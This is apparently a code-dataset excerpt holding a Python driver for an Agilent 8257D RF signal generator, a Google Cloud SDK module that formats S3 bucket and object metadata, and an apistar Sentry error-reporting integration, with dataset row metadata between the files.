in dBm. This property can be set.
"""
)
stop_power = Instrument.control(
":SOUR:POW:STOP?", ":SOUR:POW:STOP %e dBm",
""" A floating point property that represents the stop power
in dBm. This property can be set.
"""
)
dwell_time = Instrument.control(
":SOUR:SWE:DWEL1?", ":SOUR:SWE:DWEL1 %.3f",
""" A floating point property that represents the settling time
in seconds at the current frequency or power setting.
This property can be set.
"""
)
step_points = Instrument.control(
":SOUR:SWE:POIN?", ":SOUR:SWE:POIN %d",
""" An integer number of points in a step sweep. This property
can be set.
"""
)
is_enabled = Instrument.measurement(
":OUTPUT?",
""" Reads a boolean value that is True if the output is on. """,
cast=bool
)
has_modulation = Instrument.measurement(
":OUTPUT:MOD?",
""" Reads a boolean value that is True if the modulation is enabled. """,
cast=bool
)
########################
# Amplitude modulation #
########################
has_amplitude_modulation = Instrument.measurement(
":SOUR:AM:STAT?",
""" Reads a boolean value that is True if the amplitude modulation is enabled. """,
cast=bool
)
amplitude_depth = Instrument.control(
":SOUR:AM:DEPT?", ":SOUR:AM:DEPT %g",
""" A floating point property that controls the amplitude modulation
        in percent, which can take values from 0 to 100 %. """,
validator=truncated_range,
values=[0, 100]
)
AMPLITUDE_SOURCES = {
'internal': 'INT', 'internal 2': 'INT2',
'external': 'EXT', 'external 2': 'EXT2'
}
amplitude_source = Instrument.control(
":SOUR:AM:SOUR?", ":SOUR:AM:SOUR %s",
""" A string property that controls the source of the amplitude modulation
signal, which can take the values: 'internal', 'internal 2', 'external', and
'external 2'. """,
validator=strict_discrete_set,
values=AMPLITUDE_SOURCES,
map_values=True
)
####################
# Pulse modulation #
####################
has_pulse_modulation = Instrument.measurement(
":SOUR:PULM:STAT?",
""" Reads a boolean value that is True if the pulse modulation is enabled. """,
cast=bool
)
PULSE_SOURCES = {
'internal': 'INT', 'external': 'EXT', 'scalar': 'SCAL'
}
pulse_source = Instrument.control(
":SOUR:PULM:SOUR?", ":SOUR:PULM:SOUR %s",
""" A string property that controls the source of the pulse modulation
signal, which can take the values: 'internal', 'external', and
'scalar'. """,
validator=strict_discrete_set,
values=PULSE_SOURCES,
map_values=True
)
PULSE_INPUTS = {
'square': 'SQU', 'free-run': 'FRUN',
'triggered': 'TRIG', 'doublet': 'DOUB', 'gated': 'GATE'
}
pulse_input = Instrument.control(
":SOUR:PULM:SOUR:INT?", ":SOUR:PULM:SOUR:INT %s",
""" A string property that controls the internally generated modulation
input for the pulse modulation, which can take the values: 'square', 'free-run',
'triggered', 'doublet', and 'gated'.
""",
validator=strict_discrete_set,
values=PULSE_INPUTS,
map_values=True
)
pulse_frequency = Instrument.control(
":SOUR:PULM:INT:FREQ?", ":SOUR:PULM:INT:FREQ %g",
""" A floating point property that controls the pulse rate frequency in Hertz,
which can take values from 0.1 Hz to 10 MHz. """,
validator=truncated_range,
values=[0.1, 10e6]
)
########################
# Low-Frequency Output #
########################
low_freq_out_amplitude = Instrument.control(
":SOUR:LFO:AMPL? ", ":SOUR:LFO:AMPL %g VP",
"""A floating point property that controls the peak voltage (amplitude) of the
low frequency output in volts, which can take values from 0-3.5V""",
validator=truncated_range,
values=[0, 3.5]
)
LOW_FREQUENCY_SOURCES = {
'internal': 'INT', 'internal 2': 'INT2', 'function': 'FUNC', 'function 2': 'FUNC2'
}
low_freq_out_source = Instrument.control(
":SOUR:LFO:SOUR?", ":SOUR:LFO:SOUR %s",
"""A string property which controls the source of the low frequency output, which
        can take the values 'internal [2]' for the internal source, or 'function [2]' for an internal
function generator which can be configured.""",
validator=strict_discrete_set,
values=LOW_FREQUENCY_SOURCES,
map_values=True
)
def enable_low_freq_out(self):
"""Enables low frequency output"""
self.write(":SOUR:LFO:STAT ON")
def disable_low_freq_out(self):
"""Disables low frequency output"""
self.write(":SOUR:LFO:STAT OFF")
def config_low_freq_out(self, source='internal', amplitude=3):
""" Configures the low-frequency output signal.
:param source: The source for the low-frequency output signal.
:param amplitude: Amplitude of the low-frequency output
"""
self.enable_low_freq_out()
self.low_freq_out_source = source
self.low_freq_out_amplitude = amplitude
#######################
# Internal Oscillator #
#######################
internal_frequency = Instrument.control(
":SOUR:AM:INT:FREQ?", ":SOUR:AM:INT:FREQ %g",
""" A floating point property that controls the frequency of the internal
oscillator in Hertz, which can take values from 0.5 Hz to 1 MHz. """,
validator=truncated_range,
values=[0.5, 1e6]
)
INTERNAL_SHAPES = {
'sine': 'SINE', 'triangle': 'TRI', 'square': 'SQU', 'ramp': 'RAMP',
'noise': 'NOIS', 'dual-sine': 'DUAL', 'swept-sine': 'SWEP'
}
internal_shape = Instrument.control(
":SOUR:AM:INT:FUNC:SHAP?", ":SOUR:AM:INT:FUNC:SHAP %s",
""" A string property that controls the shape of the internal oscillations,
which can take the values: 'sine', 'triangle', 'square', 'ramp', 'noise',
'dual-sine', and 'swept-sine'. """,
validator=strict_discrete_set,
values=INTERNAL_SHAPES,
map_values=True
)
def __init__(self, adapter, **kwargs):
super().__init__(
adapter, "Agilent 8257D RF Signal Generator", **kwargs
)
def enable(self):
""" Enables the output of the signal. """
self.write(":OUTPUT ON;")
def disable(self):
""" Disables the output of the signal. """
self.write(":OUTPUT OFF;")
    def enable_modulation(self):
        """ Enables the signal modulation and the low-frequency output. """
self.write(":OUTPUT:MOD ON;")
self.write(":lfo:sour int; :lfo:ampl 2.0vp; :lfo:stat on;")
def disable_modulation(self):
""" Disables the signal modulation. """
self.write(":OUTPUT:MOD OFF;")
self.write(":lfo:stat off;")
def config_amplitude_modulation(self, frequency=1e3, depth=100.0, shape='sine'):
""" Configures the amplitude modulation of the output signal.
:param frequency: A modulation frequency for the internal oscillator
        :param depth: A linear depth percentage
:param shape: A string that describes the shape for the internal oscillator
"""
self.enable_amplitude_modulation()
self.amplitude_source = 'internal'
self.internal_frequency = frequency
self.internal_shape = shape
self.amplitude_depth = depth
def enable_amplitude_modulation(self):
""" Enables amplitude modulation of the output signal. """
self.write(":SOUR:AM:STAT ON")
def disable_amplitude_modulation(self):
""" Disables amplitude modulation of the output signal. """
self.write(":SOUR:AM:STAT OFF")
def config_pulse_modulation(self, frequency=1e3, input='square'):
""" Configures the pulse modulation of the output signal.
:param frequency: A pulse rate frequency in Hertz
:param input: A string that describes the internal pulse input
"""
self.enable_pulse_modulation()
self.pulse_source = 'internal'
self.pulse_input = input
self.pulse_frequency = frequency
def enable_pulse_modulation(self):
""" Enables pulse modulation of the output signal. """
self.write(":SOUR:PULM:STAT ON")
def disable_pulse_modulation(self):
""" Disables pulse modulation of the output signal. """
self.write(":SOUR:PULM:STAT OFF")
def config_step_sweep(self):
""" Configures a step sweep through frequency """
self.write(":SOUR:FREQ:MODE SWE;"
":SOUR:SWE:GEN STEP;"
":SOUR:SWE:MODE AUTO;")
    def enable_retrace(self):
        """ Enables retrace, so the sweep returns to its first point on completion. """
        self.write(":SOUR:LIST:RETR 1")
    def disable_retrace(self):
        """ Disables retrace at the end of a sweep. """
        self.write(":SOUR:LIST:RETR 0")
    def single_sweep(self):
        """ Triggers a single sweep. """
        self.write(":SOUR:TSW")
def start_step_sweep(self):
""" Starts a step sweep. """
self.write(":SOUR:SWE:CONT:STAT ON")
def stop_step_sweep(self):
""" Stops a step sweep. """
self.write(":SOUR:SWE:CONT:STAT OFF")
def shutdown(self):
""" Shuts down the instrument by disabling any modulation
and the output signal.
"""
self.disable_modulation()
self.disable()
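A short, hypothetical usage sketch exercising only the properties and methods defined above; the "GPIB::1" resource string and the sweep values are placeholders, and real use requires a connected instrument.
def demo_step_sweep(resource_name="GPIB::1"):
    generator = Agilent8257D(resource_name)
    generator.power = -10                 # output power in dBm
    generator.start_frequency = 1e9       # sweep from 1 GHz ...
    generator.stop_frequency = 2e9        # ... to 2 GHz
    generator.step_points = 101
    generator.dwell_time = 0.01           # seconds per point
    generator.config_step_sweep()
    generator.enable()
    generator.start_step_sweep()
    # ... perform measurements here ...
    generator.stop_step_sweep()
    generator.shutdown()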
| 0
| 0
| 0
| 11,223
| 0
| 0
| 0
| 83
| 68
|
dec7d6d3d15ea5d55e90e3e5423d903170fe436f
| 12,428
|
py
|
Python
|
lib/googlecloudsdk/command_lib/storage/resources/s3_resource_reference.py
|
google-cloud-sdk-unofficial/google-cloud-sdk
|
2a48a04df14be46c8745050f98768e30474a1aac
|
[
"Apache-2.0"
] | 2
|
2019-11-10T09:17:07.000Z
|
2019-12-18T13:44:08.000Z
|
lib/googlecloudsdk/command_lib/storage/resources/s3_resource_reference.py
|
google-cloud-sdk-unofficial/google-cloud-sdk
|
2a48a04df14be46c8745050f98768e30474a1aac
|
[
"Apache-2.0"
] | null | null | null |
lib/googlecloudsdk/command_lib/storage/resources/s3_resource_reference.py
|
google-cloud-sdk-unofficial/google-cloud-sdk
|
2a48a04df14be46c8745050f98768e30474a1aac
|
[
"Apache-2.0"
] | 1
|
2020-07-25T01:40:19.000Z
|
2020-07-25T01:40:19.000Z
|
# -*- coding: utf-8 -*- #
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""S3 API-specific resource subclasses."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import collections
from googlecloudsdk.api_lib.storage import errors
from googlecloudsdk.command_lib.storage.resources import resource_util
_INCOMPLETE_OBJECT_METADATA_WARNING = (
'Use "-j", the JSON flag, to view additional S3 metadata.')
def _json_dump_recursion_helper(metadata):
"""See _get_json_dump docstring."""
if isinstance(metadata, list):
return [_json_dump_recursion_helper(item) for item in metadata]
if not isinstance(metadata, dict):
return resource_util.convert_to_json_parsable_type(metadata)
# Sort by key to make sure dictionary always prints in correct order.
formatted_dict = collections.OrderedDict(sorted(metadata.items()))
for key, value in formatted_dict.items():
if isinstance(value, dict):
# Recursively handle dictionaries.
formatted_dict[key] = _json_dump_recursion_helper(value)
elif isinstance(value, list):
# Recursively handled lists, which may contain more dicts, like ACLs.
formatted_list = [_json_dump_recursion_helper(item) for item in value]
if formatted_list:
# Ignore empty lists.
formatted_dict[key] = formatted_list
elif value or resource_util.should_preserve_falsy_metadata_value(value):
formatted_dict[key] = resource_util.convert_to_json_parsable_type(value)
return formatted_dict
def _get_json_dump(resource):
"""Formats S3 resource metadata as JSON.
Args:
resource (S3BucketResource|S3ObjectResource): Resource object.
Returns:
Formatted JSON string.
"""
return resource_util.configured_json_dumps(
collections.OrderedDict([
('url', resource.storage_url.url_string),
('type', resource.TYPE_STRING),
('metadata', _json_dump_recursion_helper(resource.metadata)),
]))
def _get_error_or_exists_string(value):
"""Returns error if value is error or existence string."""
if isinstance(value, errors.S3ApiError):
return value
else:
return resource_util.get_exists_string(value)
def _get_formatted_acl_section(acl_metadata):
"""Returns formatted ACLs, error, or formatted none value."""
if isinstance(acl_metadata, errors.S3ApiError):
return resource_util.get_padded_metadata_key_value_line('ACL', acl_metadata)
elif acl_metadata:
return resource_util.get_metadata_json_section_string(
'ACL', acl_metadata, _json_dump_recursion_helper)
else:
return resource_util.get_padded_metadata_key_value_line('ACL', '[]')
def _get_full_bucket_metadata_string(resource):
"""Formats S3 resource metadata as string with rows.
Args:
resource (S3BucketResource): Resource with metadata.
Returns:
Formatted multi-line string.
"""
# Hardcoded strings found in Boto docs:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/s3.html
logging_enabled_value = _get_error_or_exists_string(
resource.metadata['LoggingEnabled'])
website_value = _get_error_or_exists_string(resource.metadata['Website'])
cors_value = _get_error_or_exists_string(resource.metadata['CORSRules'])
encryption_value = _get_error_or_exists_string(
resource.metadata['ServerSideEncryptionConfiguration'])
lifecycle_configuration_value = _get_error_or_exists_string(
resource.metadata['LifecycleConfiguration'])
if isinstance(resource.metadata['Versioning'], errors.S3ApiError):
versioning_enabled_value = resource.metadata['Versioning']
else:
versioning_status = resource.metadata['Versioning'].get('Status')
if versioning_status == 'Enabled':
versioning_enabled_value = True
elif versioning_status == 'Suspended':
versioning_enabled_value = False
else:
versioning_enabled_value = None
if isinstance(resource.metadata['Payer'], errors.S3ApiError):
requester_pays_value = resource.metadata['Payer']
elif resource.metadata['Payer'] == 'Requester':
requester_pays_value = True
elif resource.metadata['Payer'] == 'BucketOwner':
requester_pays_value = False
else:
requester_pays_value = None
return (
'{bucket_url}:\n'
'{location_constraint_line}'
'{versioning_enabled_line}'
'{logging_config_line}'
'{website_config_line}'
'{cors_config_line}'
'{encryption_config_line}'
'{lifecycle_config_line}'
'{requester_pays_line}'
'{acl_section}'
).format(
bucket_url=resource.storage_url.versionless_url_string,
location_constraint_line=resource_util.get_padded_metadata_key_value_line(
'Location Constraint', resource.metadata['LocationConstraint']),
versioning_enabled_line=resource_util.get_padded_metadata_key_value_line(
'Versioning Enabled', versioning_enabled_value),
logging_config_line=resource_util.get_padded_metadata_key_value_line(
'Logging Configuration', logging_enabled_value),
website_config_line=resource_util.get_padded_metadata_key_value_line(
'Website Configuration', website_value),
cors_config_line=resource_util.get_padded_metadata_key_value_line(
'CORS Configuration', cors_value),
encryption_config_line=resource_util.get_padded_metadata_key_value_line(
'Encryption Configuration', encryption_value),
lifecycle_config_line=resource_util.get_padded_metadata_key_value_line(
'Lifecycle Configuration', lifecycle_configuration_value),
requester_pays_line=resource_util.get_padded_metadata_key_value_line(
'Requester Pays Enabled', requester_pays_value),
# Remove ending newline character because this is the last list item.
acl_section=_get_formatted_acl_section(resource.metadata['ACL'])[:-1])
def _get_full_object_metadata_string(resource):
"""Formats S3 resource metadata as string with rows.
Args:
resource (S3ObjectResource): Resource with metadata.
Returns:
Formatted multi-line string.
"""
# Hardcoded strings found in Boto docs:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/s3.html
if 'LastModified' in resource.metadata:
optional_time_updated_line = resource_util.get_padded_metadata_time_line(
'Update Time', resource.metadata['LastModified'])
else:
optional_time_updated_line = ''
if 'StorageClass' in resource.metadata:
optional_storage_class_line = resource_util.get_padded_metadata_key_value_line(
'Storage Class', resource.metadata['StorageClass'])
else:
optional_storage_class_line = ''
if 'CacheControl' in resource.metadata:
optional_cache_control_line = resource_util.get_padded_metadata_key_value_line(
'Cache-Control', resource.metadata['CacheControl'])
else:
optional_cache_control_line = ''
  if 'ContentDisposition' in resource.metadata:
    optional_content_disposition_line = resource_util.get_padded_metadata_key_value_line(
        'Content-Disposition', resource.metadata['ContentDisposition'])
else:
optional_content_disposition_line = ''
if 'ContentEncoding' in resource.metadata:
optional_content_encoding_line = resource_util.get_padded_metadata_key_value_line(
'Content-Encoding', resource.metadata['ContentEncoding'])
else:
optional_content_encoding_line = ''
if 'ContentLanguage' in resource.metadata:
optional_content_language_line = resource_util.get_padded_metadata_key_value_line(
'Content-Language', resource.metadata['ContentLanguage'])
else:
optional_content_language_line = ''
if 'PartsCount' in resource.metadata:
optional_component_count_line = (
resource_util.get_padded_metadata_key_value_line(
'Component-Count', resource.metadata['PartsCount']))
else:
optional_component_count_line = ''
if resource.md5_hash is not None:
optional_md5_line = resource_util.get_padded_metadata_key_value_line(
'Hash (MD5)', resource.md5_hash)
elif 'SSECustomerAlgorithm' in resource.metadata:
optional_md5_line = resource_util.get_padded_metadata_key_value_line(
'Hash (MD5)', 'Underlying data encrypted')
else:
optional_md5_line = ''
if 'SSECustomerAlgorithm' in resource.metadata:
optional_encryption_algorithm_line = (
resource_util.get_padded_metadata_key_value_line(
'Encryption Algorithm', resource.metadata['SSECustomerAlgorithm']))
else:
optional_encryption_algorithm_line = ''
if resource.generation:
optional_generation_line = resource_util.get_padded_metadata_key_value_line(
'Generation', resource.generation)
else:
optional_generation_line = ''
return (
'{object_url}:\n'
'{optional_time_updated_line}'
'{optional_storage_class_line}'
'{optional_cache_control_line}'
'{optional_content_disposition_line}'
'{optional_content_encoding_line}'
'{optional_content_language_line}'
'{content_length_line}'
'{content_type_line}'
'{optional_component_count_line}'
'{optional_md5_line}'
'{optional_encryption_algorithm_line}'
'{etag_line}'
'{optional_generation_line}'
'{acl_section}'
' {incomplete_warning}').format(
object_url=resource.storage_url.versionless_url_string,
optional_time_updated_line=optional_time_updated_line,
optional_storage_class_line=optional_storage_class_line,
optional_cache_control_line=optional_cache_control_line,
optional_content_disposition_line=optional_content_disposition_line,
optional_content_encoding_line=optional_content_encoding_line,
optional_content_language_line=optional_content_language_line,
content_length_line=resource_util.get_padded_metadata_key_value_line(
'Content-Length', resource.size),
content_type_line=resource_util.get_padded_metadata_key_value_line(
'Content-Type', resource.metadata.get('ContentType')),
optional_component_count_line=optional_component_count_line,
optional_md5_line=optional_md5_line,
optional_encryption_algorithm_line=optional_encryption_algorithm_line,
etag_line=resource_util.get_padded_metadata_key_value_line(
'ETag', resource.etag),
optional_generation_line=optional_generation_line,
acl_section=_get_formatted_acl_section(resource.metadata.get('ACL')),
incomplete_warning=_INCOMPLETE_OBJECT_METADATA_WARNING)
| 38.716511
| 89
| 0.745735
|
# -*- coding: utf-8 -*- #
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""S3 API-specific resource subclasses."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import collections
from googlecloudsdk.api_lib.storage import errors
from googlecloudsdk.command_lib.storage.resources import resource_reference
from googlecloudsdk.command_lib.storage.resources import resource_util
_INCOMPLETE_OBJECT_METADATA_WARNING = (
'Use "-j", the JSON flag, to view additional S3 metadata.')
def _json_dump_recursion_helper(metadata):
"""See _get_json_dump docstring."""
if isinstance(metadata, list):
return [_json_dump_recursion_helper(item) for item in metadata]
if not isinstance(metadata, dict):
return resource_util.convert_to_json_parsable_type(metadata)
# Sort by key to make sure dictionary always prints in correct order.
formatted_dict = collections.OrderedDict(sorted(metadata.items()))
for key, value in formatted_dict.items():
if isinstance(value, dict):
# Recursively handle dictionaries.
formatted_dict[key] = _json_dump_recursion_helper(value)
elif isinstance(value, list):
# Recursively handled lists, which may contain more dicts, like ACLs.
formatted_list = [_json_dump_recursion_helper(item) for item in value]
if formatted_list:
# Ignore empty lists.
formatted_dict[key] = formatted_list
elif value or resource_util.should_preserve_falsy_metadata_value(value):
formatted_dict[key] = resource_util.convert_to_json_parsable_type(value)
return formatted_dict
def _get_json_dump(resource):
"""Formats S3 resource metadata as JSON.
Args:
resource (S3BucketResource|S3ObjectResource): Resource object.
Returns:
Formatted JSON string.
"""
return resource_util.configured_json_dumps(
collections.OrderedDict([
('url', resource.storage_url.url_string),
('type', resource.TYPE_STRING),
('metadata', _json_dump_recursion_helper(resource.metadata)),
]))
def _get_error_or_exists_string(value):
"""Returns error if value is error or existence string."""
if isinstance(value, errors.S3ApiError):
return value
else:
return resource_util.get_exists_string(value)
def _get_formatted_acl_section(acl_metadata):
"""Returns formatted ACLs, error, or formatted none value."""
if isinstance(acl_metadata, errors.S3ApiError):
return resource_util.get_padded_metadata_key_value_line('ACL', acl_metadata)
elif acl_metadata:
return resource_util.get_metadata_json_section_string(
'ACL', acl_metadata, _json_dump_recursion_helper)
else:
return resource_util.get_padded_metadata_key_value_line('ACL', '[]')
def _get_full_bucket_metadata_string(resource):
"""Formats S3 resource metadata as string with rows.
Args:
resource (S3BucketResource): Resource with metadata.
Returns:
Formatted multi-line string.
"""
# Hardcoded strings found in Boto docs:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/s3.html
logging_enabled_value = _get_error_or_exists_string(
resource.metadata['LoggingEnabled'])
website_value = _get_error_or_exists_string(resource.metadata['Website'])
cors_value = _get_error_or_exists_string(resource.metadata['CORSRules'])
encryption_value = _get_error_or_exists_string(
resource.metadata['ServerSideEncryptionConfiguration'])
lifecycle_configuration_value = _get_error_or_exists_string(
resource.metadata['LifecycleConfiguration'])
if isinstance(resource.metadata['Versioning'], errors.S3ApiError):
versioning_enabled_value = resource.metadata['Versioning']
else:
versioning_status = resource.metadata['Versioning'].get('Status')
if versioning_status == 'Enabled':
versioning_enabled_value = True
elif versioning_status == 'Suspended':
versioning_enabled_value = False
else:
versioning_enabled_value = None
if isinstance(resource.metadata['Payer'], errors.S3ApiError):
requester_pays_value = resource.metadata['Payer']
elif resource.metadata['Payer'] == 'Requester':
requester_pays_value = True
elif resource.metadata['Payer'] == 'BucketOwner':
requester_pays_value = False
else:
requester_pays_value = None
return (
'{bucket_url}:\n'
'{location_constraint_line}'
'{versioning_enabled_line}'
'{logging_config_line}'
'{website_config_line}'
'{cors_config_line}'
'{encryption_config_line}'
'{lifecycle_config_line}'
'{requester_pays_line}'
'{acl_section}'
).format(
bucket_url=resource.storage_url.versionless_url_string,
location_constraint_line=resource_util.get_padded_metadata_key_value_line(
'Location Constraint', resource.metadata['LocationConstraint']),
versioning_enabled_line=resource_util.get_padded_metadata_key_value_line(
'Versioning Enabled', versioning_enabled_value),
logging_config_line=resource_util.get_padded_metadata_key_value_line(
'Logging Configuration', logging_enabled_value),
website_config_line=resource_util.get_padded_metadata_key_value_line(
'Website Configuration', website_value),
cors_config_line=resource_util.get_padded_metadata_key_value_line(
'CORS Configuration', cors_value),
encryption_config_line=resource_util.get_padded_metadata_key_value_line(
'Encryption Configuration', encryption_value),
lifecycle_config_line=resource_util.get_padded_metadata_key_value_line(
'Lifecycle Configuration', lifecycle_configuration_value),
requester_pays_line=resource_util.get_padded_metadata_key_value_line(
'Requester Pays Enabled', requester_pays_value),
# Remove ending newline character because this is the last list item.
acl_section=_get_formatted_acl_section(resource.metadata['ACL'])[:-1])
def _get_full_object_metadata_string(resource):
"""Formats S3 resource metadata as string with rows.
Args:
resource (S3ObjectResource): Resource with metadata.
Returns:
Formatted multi-line string.
"""
# Hardcoded strings found in Boto docs:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/s3.html
if 'LastModified' in resource.metadata:
optional_time_updated_line = resource_util.get_padded_metadata_time_line(
'Update Time', resource.metadata['LastModified'])
else:
optional_time_updated_line = ''
if 'StorageClass' in resource.metadata:
optional_storage_class_line = resource_util.get_padded_metadata_key_value_line(
'Storage Class', resource.metadata['StorageClass'])
else:
optional_storage_class_line = ''
if 'CacheControl' in resource.metadata:
optional_cache_control_line = resource_util.get_padded_metadata_key_value_line(
'Cache-Control', resource.metadata['CacheControl'])
else:
optional_cache_control_line = ''
  if 'ContentDisposition' in resource.metadata:
    optional_content_disposition_line = resource_util.get_padded_metadata_key_value_line(
        'Content-Disposition', resource.metadata['ContentDisposition'])
else:
optional_content_disposition_line = ''
if 'ContentEncoding' in resource.metadata:
optional_content_encoding_line = resource_util.get_padded_metadata_key_value_line(
'Content-Encoding', resource.metadata['ContentEncoding'])
else:
optional_content_encoding_line = ''
if 'ContentLanguage' in resource.metadata:
optional_content_language_line = resource_util.get_padded_metadata_key_value_line(
'Content-Language', resource.metadata['ContentLanguage'])
else:
optional_content_language_line = ''
if 'PartsCount' in resource.metadata:
optional_component_count_line = (
resource_util.get_padded_metadata_key_value_line(
'Component-Count', resource.metadata['PartsCount']))
else:
optional_component_count_line = ''
if resource.md5_hash is not None:
optional_md5_line = resource_util.get_padded_metadata_key_value_line(
'Hash (MD5)', resource.md5_hash)
elif 'SSECustomerAlgorithm' in resource.metadata:
optional_md5_line = resource_util.get_padded_metadata_key_value_line(
'Hash (MD5)', 'Underlying data encrypted')
else:
optional_md5_line = ''
if 'SSECustomerAlgorithm' in resource.metadata:
optional_encryption_algorithm_line = (
resource_util.get_padded_metadata_key_value_line(
'Encryption Algorithm', resource.metadata['SSECustomerAlgorithm']))
else:
optional_encryption_algorithm_line = ''
if resource.generation:
optional_generation_line = resource_util.get_padded_metadata_key_value_line(
'Generation', resource.generation)
else:
optional_generation_line = ''
return (
'{object_url}:\n'
'{optional_time_updated_line}'
'{optional_storage_class_line}'
'{optional_cache_control_line}'
'{optional_content_disposition_line}'
'{optional_content_encoding_line}'
'{optional_content_language_line}'
'{content_length_line}'
'{content_type_line}'
'{optional_component_count_line}'
'{optional_md5_line}'
'{optional_encryption_algorithm_line}'
'{etag_line}'
'{optional_generation_line}'
'{acl_section}'
' {incomplete_warning}').format(
object_url=resource.storage_url.versionless_url_string,
optional_time_updated_line=optional_time_updated_line,
optional_storage_class_line=optional_storage_class_line,
optional_cache_control_line=optional_cache_control_line,
optional_content_disposition_line=optional_content_disposition_line,
optional_content_encoding_line=optional_content_encoding_line,
optional_content_language_line=optional_content_language_line,
content_length_line=resource_util.get_padded_metadata_key_value_line(
'Content-Length', resource.size),
content_type_line=resource_util.get_padded_metadata_key_value_line(
'Content-Type', resource.metadata.get('ContentType')),
optional_component_count_line=optional_component_count_line,
optional_md5_line=optional_md5_line,
optional_encryption_algorithm_line=optional_encryption_algorithm_line,
etag_line=resource_util.get_padded_metadata_key_value_line(
'ETag', resource.etag),
optional_generation_line=optional_generation_line,
acl_section=_get_formatted_acl_section(resource.metadata.get('ACL')),
incomplete_warning=_INCOMPLETE_OBJECT_METADATA_WARNING)
class S3BucketResource(resource_reference.BucketResource):
"""API-specific subclass for handling metadata."""
def get_full_metadata_string(self):
return _get_full_bucket_metadata_string(self)
def get_json_dump(self):
return _get_json_dump(self)
class S3ObjectResource(resource_reference.ObjectResource):
"""API-specific subclass for handling metadata."""
def __init__(self,
storage_url_object,
content_type=None,
creation_time=None,
etag=None,
crc32c_hash=None,
md5_hash=None,
metadata=None,
metageneration=None,
size=None):
"""Initializes resource. Args are a subset of attributes."""
super(S3ObjectResource, self).__init__(
storage_url_object,
content_type=content_type,
creation_time=creation_time,
etag=etag,
crc32c_hash=None,
md5_hash=md5_hash,
metadata=metadata,
metageneration=metageneration,
size=size)
def get_full_metadata_string(self):
return _get_full_object_metadata_string(self)
def get_json_dump(self):
return _get_json_dump(self)
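A toy illustration (not real SDK usage) of the JSON formatter above: _get_json_dump only reads storage_url.url_string, TYPE_STRING and metadata from the resource, so a simple stand-in object is enough to show roughly what it emits. The attribute values below are placeholders, and the exact formatting depends on resource_util.configured_json_dumps.
class _FakeUrl(object):
  url_string = 's3://example-bucket/example-object'  # placeholder URL
class _FakeResource(object):
  TYPE_STRING = 'cloud_object'  # placeholder type label
  storage_url = _FakeUrl()
  metadata = {'ContentType': 'text/plain', 'ETag': '"abc123"'}
# _get_json_dump(_FakeResource()) would return a JSON string shaped like:
# {"url": "s3://example-bucket/example-object",
#  "type": "cloud_object",
#  "metadata": {"ContentType": "text/plain", "ETag": "\"abc123\""}}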
| 0
| 0
| 0
| 1,152
| 0
| 0
| 0
| 54
| 68
|
d66df52d49ff61c5175e83fab8cd02546b04169c
| 1,982
|
py
|
Python
|
apistar_sentry.py
|
LeadPages/apistar_sentry
|
f718784b256399ae04f4e8bf82b177f9cc3b1008
|
[
"MIT"
] | 2
|
2018-06-10T14:37:04.000Z
|
2018-06-16T22:33:46.000Z
|
apistar_sentry.py
|
LeadPages/apistar_sentry
|
f718784b256399ae04f4e8bf82b177f9cc3b1008
|
[
"MIT"
] | 3
|
2020-03-24T17:19:55.000Z
|
2021-02-02T22:08:44.000Z
|
apistar_sentry.py
|
LeadPages/apistar_sentry
|
f718784b256399ae04f4e8bf82b177f9cc3b1008
|
[
"MIT"
] | 1
|
2018-04-16T18:44:33.000Z
|
2018-04-16T18:44:33.000Z
|
__version__ = "0.2.0"
| 26.426667
| 72
| 0.590817
|
import typing
from apistar import Settings
from apistar.interfaces import Auth
from apistar.types import ReturnValue
from raven import Client
__version__ = "0.2.0"
class Sentry:
def __init__(self, settings: Settings) -> None:
self.client = Client(
settings["SENTRY_DSN"],
environment=settings["ENVIRONMENT"],
release=settings["VERSION"],
)
@classmethod
def setup(cls, settings: Settings) -> typing.Optional["Sentry"]:
if settings.get("SENTRY_DSN"):
return cls(settings)
return None
@classmethod
def setup_celery(cls, settings: Settings) -> None:
from raven.contrib import celery as raven_celery
sentry = cls(settings)
raven_celery.register_logger_signal(sentry.client)
raven_celery.register_signal(sentry.client)
def track(self, auth: Auth) -> None:
self.client.context.activate()
if auth is not None:
self.client.context.merge({
"user": {
"id": auth.get_user_id(),
"name": auth.get_display_name(),
"authenticated": auth.is_authenticated(),
}
})
def clear(self) -> None:
self.client.context.clear()
def capture_exception(self) -> None:
self.client.captureException()
class SentryMixin:
def exception_handler(self, exc: Exception, sentry: Sentry) -> None:
try:
return super().exception_handler(exc)
except Exception:
if sentry is not None:
try:
sentry.capture_exception()
finally:
sentry.clear()
raise
def before_request(auth: Auth, sentry: Sentry) -> None:
if sentry is not None:
sentry.track(auth)
def after_request(sentry: Sentry, ret: ReturnValue) -> ReturnValue:
if sentry is not None:
sentry.clear()
return ret
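A minimal sketch (settings values are placeholders) of the lifecycle the hooks above implement: build the client from settings, activate and tag the per-request context, capture any exception, then clear the context.
def _sentry_demo() -> None:
    settings = {
        "SENTRY_DSN": "https://public@sentry.example.com/1",  # placeholder DSN
        "ENVIRONMENT": "development",
        "VERSION": __version__,
    }
    sentry = Sentry.setup(settings)  # returns None when SENTRY_DSN is not set
    if sentry is not None:
        sentry.track(None)           # no authenticated user in this sketch
        try:
            raise RuntimeError("boom")
        except RuntimeError:
            sentry.capture_exception()
        finally:
            sentry.clear()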
| 0
| 398
| 0
| 1,123
| 0
| 199
| 0
| 32
| 203
|
460ed8df205faa3ecff6b37fb600ecfce371a297
| 7,121
|
py
